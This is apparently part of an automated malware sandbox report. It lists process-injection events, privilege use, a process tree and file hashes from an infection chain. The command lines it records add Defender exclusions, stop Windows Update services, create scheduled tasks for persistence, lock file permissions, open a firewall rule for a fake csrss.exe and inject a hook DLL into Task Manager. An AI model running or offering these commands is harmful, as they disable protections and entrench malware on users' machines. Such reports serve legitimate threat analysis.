N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\EDDC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\source1.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\9890.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\99D8.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\rss\csrss.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1728 wrote to memory of 2712 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v3347808.exe
PID 1728 wrote to memory of 2712 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v3347808.exe
PID 1728 wrote to memory of 2712 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v3347808.exe
PID 1728 wrote to memory of 2712 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v3347808.exe
PID 1728 wrote to memory of 2712 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v3347808.exe
PID 1728 wrote to memory of 2712 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v3347808.exe
PID 1728 wrote to memory of 2712 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v3347808.exe
PID 2712 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v3347808.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a5934857.exe
PID 2712 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v3347808.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a5934857.exe
PID 2712 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v3347808.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a5934857.exe
PID 2712 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v3347808.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a5934857.exe
PID 2712 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v3347808.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a5934857.exe
PID 2712 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v3347808.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a5934857.exe
PID 2712 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v3347808.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a5934857.exe
PID 2668 wrote to memory of 2680 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a5934857.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2668 wrote to memory of 2680 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a5934857.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2668 wrote to memory of 2680 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a5934857.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2668 wrote to memory of 2680 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a5934857.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2668 wrote to memory of 2680 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a5934857.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2668 wrote to memory of 2680 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a5934857.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2668 wrote to memory of 2680 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a5934857.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2668 wrote to memory of 2680 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a5934857.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2668 wrote to memory of 2680 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a5934857.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2668 wrote to memory of 2680 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a5934857.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2668 wrote to memory of 2000 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a5934857.exe C:\Windows\SysWOW64\WerFault.exe
PID 2668 wrote to memory of 2000 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a5934857.exe C:\Windows\SysWOW64\WerFault.exe
PID 2668 wrote to memory of 2000 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a5934857.exe C:\Windows\SysWOW64\WerFault.exe
PID 2668 wrote to memory of 2000 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a5934857.exe C:\Windows\SysWOW64\WerFault.exe
PID 2668 wrote to memory of 2000 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a5934857.exe C:\Windows\SysWOW64\WerFault.exe
PID 2668 wrote to memory of 2000 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a5934857.exe C:\Windows\SysWOW64\WerFault.exe
PID 2668 wrote to memory of 2000 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a5934857.exe C:\Windows\SysWOW64\WerFault.exe
PID 1244 wrote to memory of 2152 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\E2A2.exe
PID 1244 wrote to memory of 2152 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\E2A2.exe
PID 1244 wrote to memory of 2152 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\E2A2.exe
PID 1244 wrote to memory of 2152 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\E2A2.exe
PID 1244 wrote to memory of 2152 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\E2A2.exe
PID 1244 wrote to memory of 2152 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\E2A2.exe
PID 1244 wrote to memory of 2152 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\E2A2.exe
PID 2152 wrote to memory of 764 N/A C:\Users\Admin\AppData\Local\Temp\E2A2.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\ZI4xM2Zd.exe
PID 2152 wrote to memory of 764 N/A C:\Users\Admin\AppData\Local\Temp\E2A2.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\ZI4xM2Zd.exe
PID 2152 wrote to memory of 764 N/A C:\Users\Admin\AppData\Local\Temp\E2A2.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\ZI4xM2Zd.exe
PID 2152 wrote to memory of 764 N/A C:\Users\Admin\AppData\Local\Temp\E2A2.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\ZI4xM2Zd.exe
PID 2152 wrote to memory of 764 N/A C:\Users\Admin\AppData\Local\Temp\E2A2.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\ZI4xM2Zd.exe
PID 2152 wrote to memory of 764 N/A C:\Users\Admin\AppData\Local\Temp\E2A2.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\ZI4xM2Zd.exe
PID 2152 wrote to memory of 764 N/A C:\Users\Admin\AppData\Local\Temp\E2A2.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\ZI4xM2Zd.exe
PID 764 wrote to memory of 2964 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\ZI4xM2Zd.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\pG3rS0fl.exe
PID 764 wrote to memory of 2964 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\ZI4xM2Zd.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\pG3rS0fl.exe
PID 764 wrote to memory of 2964 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\ZI4xM2Zd.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\pG3rS0fl.exe
PID 764 wrote to memory of 2964 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\ZI4xM2Zd.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\pG3rS0fl.exe
PID 764 wrote to memory of 2964 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\ZI4xM2Zd.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\pG3rS0fl.exe
PID 764 wrote to memory of 2964 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\ZI4xM2Zd.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\pG3rS0fl.exe
PID 764 wrote to memory of 2964 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\ZI4xM2Zd.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\pG3rS0fl.exe
PID 2964 wrote to memory of 2968 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\pG3rS0fl.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\Hf8Mh2Uh.exe
PID 2964 wrote to memory of 2968 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\pG3rS0fl.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\Hf8Mh2Uh.exe
PID 2964 wrote to memory of 2968 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\pG3rS0fl.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\Hf8Mh2Uh.exe
PID 2964 wrote to memory of 2968 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\pG3rS0fl.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\Hf8Mh2Uh.exe
PID 2964 wrote to memory of 2968 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\pG3rS0fl.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\Hf8Mh2Uh.exe
PID 2964 wrote to memory of 2968 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\pG3rS0fl.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\Hf8Mh2Uh.exe
PID 2964 wrote to memory of 2968 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\pG3rS0fl.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\Hf8Mh2Uh.exe
PID 1244 wrote to memory of 1932 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\E66A.exe
PID 2968 wrote to memory of 240 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\Hf8Mh2Uh.exe C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\Lq5hq4TW.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\file.exe

"C:\Users\Admin\AppData\Local\Temp\file.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v3347808.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v3347808.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a5934857.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a5934857.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2668 -s 36

C:\Users\Admin\AppData\Local\Temp\E2A2.exe

C:\Users\Admin\AppData\Local\Temp\E2A2.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\ZI4xM2Zd.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\ZI4xM2Zd.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\pG3rS0fl.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\pG3rS0fl.exe

C:\Users\Admin\AppData\Local\Temp\E66A.exe

C:\Users\Admin\AppData\Local\Temp\E66A.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\Hf8Mh2Uh.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\Hf8Mh2Uh.exe

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\Lq5hq4TW.exe

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\Lq5hq4TW.exe

C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\1WK02es6.exe

C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\1WK02es6.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1932 -s 132

C:\Users\Admin\AppData\Local\Temp\E8EA.bat

"C:\Users\Admin\AppData\Local\Temp\E8EA.bat"

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\E9E2.tmp\E9E3.tmp\E9E4.bat C:\Users\Admin\AppData\Local\Temp\E8EA.bat"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1980 -s 280

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" https://accounts.google.com/

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" https://www.facebook.com/login

C:\Users\Admin\AppData\Local\Temp\ECA3.exe

C:\Users\Admin\AppData\Local\Temp\ECA3.exe

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2564 CREDAT:340993 /prefetch:2

C:\Users\Admin\AppData\Local\Temp\EDDC.exe

C:\Users\Admin\AppData\Local\Temp\EDDC.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2308 -s 132

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:332 CREDAT:275457 /prefetch:2

C:\Users\Admin\AppData\Local\Temp\F195.exe

C:\Users\Admin\AppData\Local\Temp\F195.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

"C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe" /F

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "explothe.exe" /P "Admin:N"&&CACLS "explothe.exe" /P "Admin:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "Admin:N"&&CACLS "..\fefffe8cea" /P "Admin:R" /E&&Exit

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:R" /E

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:N"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:R" /E

C:\Windows\system32\taskeng.exe

taskeng.exe {8F3C0FBA-5638-42E4-B77A-272792604F86} S-1-5-21-607259312-1573743425-2763420908-1000:NGTQGRML\Admin:Interactive:[1]

C:\Users\Admin\AppData\Local\Temp\42F0.exe

C:\Users\Admin\AppData\Local\Temp\42F0.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Users\Admin\AppData\Local\Temp\source1.exe

"C:\Users\Admin\AppData\Local\Temp\source1.exe"

C:\Users\Admin\AppData\Local\Temp\latestX.exe

"C:\Users\Admin\AppData\Local\Temp\latestX.exe"

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\9535.exe

C:\Users\Admin\AppData\Local\Temp\9535.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2420 -s 528

C:\Users\Admin\AppData\Local\Temp\9890.exe

C:\Users\Admin\AppData\Local\Temp\9890.exe

C:\Users\Admin\AppData\Local\Temp\99D8.exe

C:\Users\Admin\AppData\Local\Temp\99D8.exe

C:\Windows\system32\makecab.exe

"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20231010203613.log C:\Windows\Logs\CBS\CbsPersist_20231010203613.cab

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\system32\schtasks.exe

schtasks /delete /tn ScheduledUpdate /f

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe

"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Windows\system32\taskeng.exe

taskeng.exe {DE3DA5EE-5DAF-4FA9-87C2-AF556D1D1414} S-1-5-18:NT AUTHORITY\System:Service:

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

Network


Files

\Users\Admin\AppData\Local\Temp\IXP000.TMP\v3347808.exe

MD5 67a1b31081ef62bb8ce59d0a1e56ff3a
SHA1 0ec0e4670ade51e1b6af30a2a05708266058eada
SHA256 8abea1edccaffa386797268d582bebd5a3ecc7cd93bd730f31b69e90d05f7745
SHA512 a94d12034135b3ab20a9529f7d7b20a20b6e09fa8ba3479d46c53ff8d2b4ff6c5cd15dd538c989ad2c513c17d26eecc385a3e3867aaa5b1c61bbbadc0dca5942

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v3347808.exe

MD5 67a1b31081ef62bb8ce59d0a1e56ff3a
SHA1 0ec0e4670ade51e1b6af30a2a05708266058eada
SHA256 8abea1edccaffa386797268d582bebd5a3ecc7cd93bd730f31b69e90d05f7745
SHA512 a94d12034135b3ab20a9529f7d7b20a20b6e09fa8ba3479d46c53ff8d2b4ff6c5cd15dd538c989ad2c513c17d26eecc385a3e3867aaa5b1c61bbbadc0dca5942

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v3347808.exe

MD5 67a1b31081ef62bb8ce59d0a1e56ff3a
SHA1 0ec0e4670ade51e1b6af30a2a05708266058eada
SHA256 8abea1edccaffa386797268d582bebd5a3ecc7cd93bd730f31b69e90d05f7745
SHA512 a94d12034135b3ab20a9529f7d7b20a20b6e09fa8ba3479d46c53ff8d2b4ff6c5cd15dd538c989ad2c513c17d26eecc385a3e3867aaa5b1c61bbbadc0dca5942

\Users\Admin\AppData\Local\Temp\IXP000.TMP\v3347808.exe

MD5 67a1b31081ef62bb8ce59d0a1e56ff3a
SHA1 0ec0e4670ade51e1b6af30a2a05708266058eada
SHA256 8abea1edccaffa386797268d582bebd5a3ecc7cd93bd730f31b69e90d05f7745
SHA512 a94d12034135b3ab20a9529f7d7b20a20b6e09fa8ba3479d46c53ff8d2b4ff6c5cd15dd538c989ad2c513c17d26eecc385a3e3867aaa5b1c61bbbadc0dca5942

\Users\Admin\AppData\Local\Temp\IXP001.TMP\a5934857.exe

MD5 2a9c0887c124fefda2d88716a3746b5b
SHA1 0b42239384e6d76bf3fc728f00d7b3462c98d40a
SHA256 2255adc341fea412cac0201d71655709ad06af82dfa0c861f8a38f76f0559145
SHA512 4b769fcfa9bc3fe84fb6b096e72ff74dde87f3391557bc68e9babe00dd458d0f70070defec40aaace0164156d5656005496043cdf324be0071f029aa9e1f2c09

\Users\Admin\AppData\Local\Temp\IXP001.TMP\a5934857.exe

MD5 2a9c0887c124fefda2d88716a3746b5b
SHA1 0b42239384e6d76bf3fc728f00d7b3462c98d40a
SHA256 2255adc341fea412cac0201d71655709ad06af82dfa0c861f8a38f76f0559145
SHA512 4b769fcfa9bc3fe84fb6b096e72ff74dde87f3391557bc68e9babe00dd458d0f70070defec40aaace0164156d5656005496043cdf324be0071f029aa9e1f2c09

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a5934857.exe

MD5 2a9c0887c124fefda2d88716a3746b5b
SHA1 0b42239384e6d76bf3fc728f00d7b3462c98d40a
SHA256 2255adc341fea412cac0201d71655709ad06af82dfa0c861f8a38f76f0559145
SHA512 4b769fcfa9bc3fe84fb6b096e72ff74dde87f3391557bc68e9babe00dd458d0f70070defec40aaace0164156d5656005496043cdf324be0071f029aa9e1f2c09

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a5934857.exe

MD5 2a9c0887c124fefda2d88716a3746b5b
SHA1 0b42239384e6d76bf3fc728f00d7b3462c98d40a
SHA256 2255adc341fea412cac0201d71655709ad06af82dfa0c861f8a38f76f0559145
SHA512 4b769fcfa9bc3fe84fb6b096e72ff74dde87f3391557bc68e9babe00dd458d0f70070defec40aaace0164156d5656005496043cdf324be0071f029aa9e1f2c09

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a5934857.exe

MD5 2a9c0887c124fefda2d88716a3746b5b
SHA1 0b42239384e6d76bf3fc728f00d7b3462c98d40a
